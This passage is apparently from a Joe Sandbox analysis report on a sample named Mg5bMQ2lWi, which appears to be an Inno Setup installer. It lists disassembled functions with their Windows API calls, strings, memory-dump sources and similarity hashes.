ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E

Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A

Strings

Setup, xrefs: 00497144

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
String ID: Setup
API String ID: 3870281231-3839654196
Opcode ID: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
Instruction ID: ebb0a401c3e664f155299204c0f5f4603c455a0fe39dfd081332d01f58350741
Opcode Fuzzy Hash: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
Instruction Fuzzy Hash: CE31B4312186409FDA11BBB7ED1391D3BA4EB8971C7A2447FF90482663DE3D58508A6E

Function 0041EEB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041EF03
73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09

Strings

RzE, xrefs: 0041EF46

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: A25940CurrentThread
String ID: RzE
API String ID: 2655091166-1126107055
Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18

Function 0047B0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122

Strings

RegisteredOrganization, xrefs: 0047B111
RegisteredOwner, xrefs: 0047B0FF

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3535843008-1113070880
Opcode ID: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
Instruction ID: c0e5db093c22981a2c4b78a2736f8ddfc80e316131ebabe5fbae1d79ea558dad
Opcode Fuzzy Hash: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
Instruction Fuzzy Hash: F1F0BB70708284ABEB00D675FD92BDB3359D742344F50807BA5149B391D7B99E01D79C

Function 004741CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

Strings

CreateFile, xrefs: 004741FD

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: CreateFile
API String ID: 2528220319-823142352
Opcode ID: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
Instruction ID: 58c46c97337ee3450255063b4db4f116026cd25e8145783c5652bdd163bde5c5
Opcode Fuzzy Hash: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
Instruction Fuzzy Hash: 78E06D342803447FEA10F769DCC6F5A7788AB04768F108152FA58AF3E3C6B9EC408618

Function 004562AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242

Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0

Strings

shell32.dll, xrefs: 004562C5
SHCreateItemFromParsingName, xrefs: 004562BB

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressErrorInitializeLibraryLoadModeProc
String ID: SHCreateItemFromParsingName$shell32.dll
API String ID: 2906209438-2320870614
Opcode ID: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
Instruction ID: 517aaa95fd919f42fec07b3e20ba2fe3b86c01757d5d2d7eeafb2f6c84d6a724
Opcode Fuzzy Hash: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
Instruction Fuzzy Hash: 4CC040D074455095CA0077FB540374F14149750717F5180BFB848675C7DF3D440D566E

Function 0046BE24 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39

Strings

shell32.dll, xrefs: 0046BE2E
SHPathPrepareForWriteA, xrefs: 0046BE24

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressErrorLibraryLoadModeProc
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2492108670-2683653824
Opcode ID: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
Instruction ID: f15142af1028fbda52646c9d138091dcd6bfc2c127db856ea005f68399f83491
Opcode Fuzzy Hash: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
Instruction Fuzzy Hash: 76B092A0B00780C6CE00BBB3A8127871528D740704B10C07F7240EA696FF7E8C458FEE

Function 00480230 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Menu$Append$System
String ID:
API String ID: 1489644407-0
Opcode ID: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
Instruction ID: 04a05a6f5988e1ad1c69e12ed442e821a58669dfeb252773ef60a283987a992a
Opcode Fuzzy Hash: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
Instruction Fuzzy Hash: 3431B0707043441BD721FB769C8AB9E3A949B1531CF5408BBF800AA3D3CABC9C09879D

Function 0044ABE0 Relevance: 4.6, APIs: 3, Instructions: 74COMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
SelectObject.GDI32(?,00000000), ref: 0044AC78
73A1A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: A480A570ObjectSelect
String ID:
API String ID: 1230475511-0
Opcode ID: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
Opcode Fuzzy Hash: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A

Function 0044A914 Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: DrawText$ByteCharMultiWide
String ID:
API String ID: 65125430-0
Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669

Function 0042440C Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
TranslateMessage.USER32(?), ref: 0042449F
DispatchMessageA.USER32(?), ref: 004244A9

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A

Function 00416654 Relevance: 4.5, APIs: 3, Instructions: 39COMMON

Download Yara Rule

APIs

SetPropA.USER32(00000000,00000000), ref: 0041667A
SetPropA.USER32(00000000,00000000), ref: 0041668F
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Prop$Window
String ID:
API String ID: 3363284559-0
Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8

Function 0041EE64 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0041EE74
IsWindowEnabled.USER32(?), ref: 0041EE7E
EnableWindow.USER32(?,00000000), ref: 0041EEA4

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$EnableEnabledVisible
String ID:
API String ID: 3234591441-0
Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78

Function 00480B7C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 00480C2A

Strings

InitializeWizard, xrefs: 00480BC3

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ActiveWindow
String ID: InitializeWizard
API String ID: 2558294473-2356795471
Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D

Function 0047AFDC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 47109696-1019749484
Opcode ID: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
Instruction ID: 32b1a4b4f3febb624688285ac2ab15cdeec5a734a0466c395ac52858640c886b
Opcode Fuzzy Hash: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
Instruction Fuzzy Hash: 7CF0E93170021467D700A55A6D02BAF528DCB80358F20407FF508EB342DABA9D06039C

Function 0046DE6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F

Strings

Inno Setup: Setup Version, xrefs: 0046DE8D

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Value
String ID: Inno Setup: Setup Version
API String ID: 3702945584-4166306022
Opcode ID: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
Instruction ID: 3f565b73c41be68d18d1c675279a4c2ca8d62721aeaae2bfa6e8ff1167108c85
Opcode Fuzzy Hash: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
Instruction Fuzzy Hash: 6AE06D717016043FD710AA2BDC85F6BBADCDF983A5F10403AB908EB392D578DD0081A8

Function 0046DEDC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF

Strings

NoModify, xrefs: 0046DEED

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Value
String ID: NoModify
API String ID: 3702945584-1699962838
Opcode ID: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
Instruction ID: 16e32e904041cf2989cb5be4c2021f94977a521c7974260517dd4293f9cbe128
Opcode Fuzzy Hash: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
Instruction Fuzzy Hash: 64E04FB0A04304BFEB04EB55CD4AF6F77ACDB48754F104059BA089B291E674EE00C668

Function 0042DD44 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

Strings

System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Open
String ID: System\CurrentControlSet\Control\Windows
API String ID: 71445658-1109719901
Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4

Function 0045363C Relevance: 3.2, APIs: 2, Instructions: 190fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
Instruction ID: 9ec0e3c397c6f5708f2a232916c112a37fe27e538a562d44e8698fe4f4711445
Opcode Fuzzy Hash: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
